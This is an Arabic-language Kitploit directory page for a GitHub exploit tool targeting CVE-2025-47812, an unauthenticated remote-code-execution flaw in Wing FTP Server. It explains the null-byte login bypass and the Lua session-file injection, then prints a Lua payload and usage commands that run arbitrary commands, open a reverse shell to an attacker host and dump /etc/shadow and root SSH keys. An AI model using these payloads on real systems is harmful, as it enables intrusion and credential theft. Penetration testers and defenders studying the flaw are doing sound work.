Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-47812 — RCE لـ WingFTP v4.7.3 | Kitploit
أدوات/GitHubGitHub/popyue/cve-2025-47812
الاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةأداة الوصول عن بعدتطوير الحمولات
GitHubpopyue/cve-2025-47812

CVE-2025-47812

RCE لـ WingFTP v4.7.3

عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-47812 — ثغرة تنفيذ أوامر عن بعد غير موثقة في Wing FTP Server

root@kitploit:~
 ██╗    ██╗██╗███╗   ██╗ ██████╗     ███████╗████████╗██████╗
 ██║    ██║██║████╗  ██║██╔════╝     ██╔════╝╚══██╔══╝██╔══██╗
 ██║ █╗ ██║██║██╔██╗ ██║██║  ███╗    █████╗     ██║   ██████╔╝
 ██║███╗██║██║██║╚██╗██║██║   ██║    ██╔══╝     ██║   ██╔═══╝
 ╚███╔███╔╝██║██║ ╚████║╚██████╔╝    ██║        ██║   ██║
  ╚══╝╚══╝ ╚═╝╚═╝  ╚═══╝ ╚═════╝     ╚═╝        ╚═╝   ╚═╝

نظرة عامة

الحقلالتفاصيل
CVECVE-2025-47812
المتأثرWing FTP Server <= 7.4.3
تم الإصلاح فيWing FTP Server 7.4.4
CVSS10.0 (حرج)
مطلوب توثيقلا (يكفي تسجيل الدخول كمجهول)
الصلاحية المكتسبةroot (لينكس) / NT AUTHORITY\SYSTEM (ويندوز)
اكتشفهاJulien Ahrens (@MrTuxracer) — rcesecurity.com

وصف الثغرة

الواجهة الإلكترونية لخادم Wing FTP معرضة لهجوم تنفيذ أوامر عن بعد (RCE) من مرحلتين دون الحاجة إلى توثيق مسبق.

المرحلة الأولى — تجاوز التوثيق عبر البايت الصفري + حقن كود Lua

تستخدم الدالة c_CheckUser() في ملف Wing FTP الثنائي دالة strlen() داخلياً، مما يؤدي إلى اقتطاع سلسلة اسم المستخدم عند أول بايت صفري (\x00). وهذا يعني أن اسم مستخدم مثل anonymous%00<بيانات_عشوائية> يمرر عملية التوثيق طالما أن المستخدم anonymous (أو أي مستخدم صالح) موجود.

بعد نجاح التوثيق، يقوم الملف loginok.html باستدعاء rawset(_SESSION, "username", username) باستخدام كامل معامل POST غير المنقى — بما في ذلك كل ما بعد البايت الصفري. ثم يتم تسلسل الجلسة إلى ملف نصي بلغة Lua على القرص عبر SessionModule.save().

نظراً لأن دالة التسلسل تلف قيم السلسلة النصية داخل [[...]] محددات النصوص الطويلة في Lua دون أي تنقية، فإن حقن ]] في اسم المستخدم ينهي المحدد مبكراً، مما يسمح بإلحاق كود Lua تعسفي بملف الجلسة.

بنية الحمولة:

root@kitploit:~
anonymous\x00]]
local h = io.popen("id")
local r = h:read("*a")
h:close()
print(r)
--

تعمل -- في النهاية على تعليق ]] الذي يلحقه Wing FTP بعد القيمة.

المرحلة الثانية — التشغيل عبر نقطة نهاية موثقة

ملف الجلسة (الذي يحمل اسم قيمة كوكي UID) هو نص Lua يتم تنفيذه عبر loadfile() + f() عند الوصول إلى أي نقطة نهاية موثقة. إرسال طلب POST /dir.html مع كوكي UID ينفذ كود Lua المحقون ويعيد إخراج الأمر في جسم الاستجابة، قبل محتوى <?xml.


المتطلبات

  • Python 3.10+
  • requests, urllib3
root@kitploit:~
pip install -r requirements.txt

الاستخدام

root@kitploit:~
usage: CVE-2025-47812 [-h] [-U USER] [-P PASS] [--vhost HOST] [--timeout N]
                      [--verify-ssl]
                      [--cmd CMD | --shell | --revshell | --dump]
                      [--lhost IP] [--lport PORT] [--listen]
                      target

أمثلة

root@kitploit:~
# Single command
python3 CVE-2025-47812.py http://ftp.target.com --cmd "id"
python3 CVE-2025-47812.py http://ftp.target.com --cmd "cat /etc/passwd"

# Target by IP (Wing FTP uses virtual-host routing — supply hostname with --vhost)
python3 CVE-2025-47812.py http://10.10.10.10 --vhost ftp.target.com --cmd "id"

# Interactive pseudo-shell
python3 CVE-2025-47812.py http://ftp.target.com --shell

# Reverse shell (start nc listener separately)
python3 CVE-2025-47812.py http://ftp.target.com --revshell --lhost 10.10.14.5 --lport 4444

# Reverse shell with built-in listener
python3 CVE-2025-47812.py http://ftp.target.com --revshell --listen --lhost 10.10.14.5 --lport 4444

# Dump sensitive files (/etc/passwd, /etc/shadow, Wing.cfg, root SSH key)
python3 CVE-2025-47812.py http://ftp.target.com --dump

# With non-anonymous credentials
python3 CVE-2025-47812.py http://ftp.target.com -U ftpuser -P secret --cmd "whoami"

الإصلاح

قم بترقية Wing FTP Server إلى الإصدار 7.4.4 أو أحدث.


المراجع

  • المقال الأصلي: https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
  • ذات صلة: CVE-2025-47811 (صلاحيات الخدمة المفرطة)، CVE-2025-47813 (كشف المسار عبر كوكي UID طويلة جداً)

إخلاء مسؤولية

هذه الأداة مقدمة لأغراض تعليمية واختبارات الاختراق المصرح بها فقط. تشغيل هذا الاستغلال ضد أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها غير قانوني وغير أخلاقي. لا يتحمل المؤلف أي مسؤولية عن أي استخدام خاطئ.

تنزيل الأداة